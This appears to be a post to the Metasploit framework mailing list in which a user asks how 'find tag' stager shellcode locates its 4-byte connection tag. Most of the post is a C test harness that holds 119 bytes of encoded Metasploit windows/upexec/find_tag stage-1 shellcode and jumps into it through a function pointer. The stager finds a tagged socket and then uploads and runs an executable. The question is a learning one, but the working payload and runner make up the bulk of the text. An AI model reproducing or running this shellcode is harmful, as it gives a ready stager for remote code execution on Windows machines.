Understanding Find Tag shellcode

[cr01nk zer0 <cr01nk () gmail com>]

Hi ,

Could anybody help me in understanding find tag class of shellcodes.

How to find the 4 byte connection tag (I think that first 119 byte shellcode
is implementing a connection tag) and
how to implement it in a shellcode testing code
===================================================================================================
#include <stdio.h>
#include <string.h>

/*
 * windows/upexec/find_tag - 119 bytes (stage 1)
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * TAG=0BoU, EXITFUNC=thread,
 * PEXEC=c:\windows\system32\calc.exe
 */

unsigned char buf[] =
"\x33\xc9\xb1\x18\xbf\xed\xc2\xfb\x72\xdb\xc3\xd9\x74\x24\xf4"
"\x5d\x31\x7d\x0e\x03\x7d\x0e\x83\x28\xc6\x19\x87\x4e\xf4\x22"
"\x0c\x25\xbc\xec\x46\x79\x4f\x86\x01\x65\xc4\x83\x3a\xe6\xfa"
"\x1e\x91\x46\xf8\x66\xd7\x64\xcd\x39\x15\xfd\xde\x4d\x32\xf5"
"\xab\x17\xf9\x8e\xe0\x92\x79\x1b\xb4\x91\x65\x90\x19\x83\xa9"
"\xa5\x7c\xd0\xbd\x80\x5a\x80\x5b\x95\x29\xda\xf2\x71\x51\x45"
"\xff\xc1\xfa\x76\x2a\x6c\x81\x49\xa1\x80\x13\x1b\xfc\x50\x76"
"\xca\x57\x97\xa5\x5f\x6a\x57\x08\xcf\xc0\xe2\x51\xf0\x0d";

int main()
{
 void (*c0de)();
 printf("Stager Shellcode Test\"\n");
 *(int*)&c0de = (unsigned)buf;
 c0de();
}

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework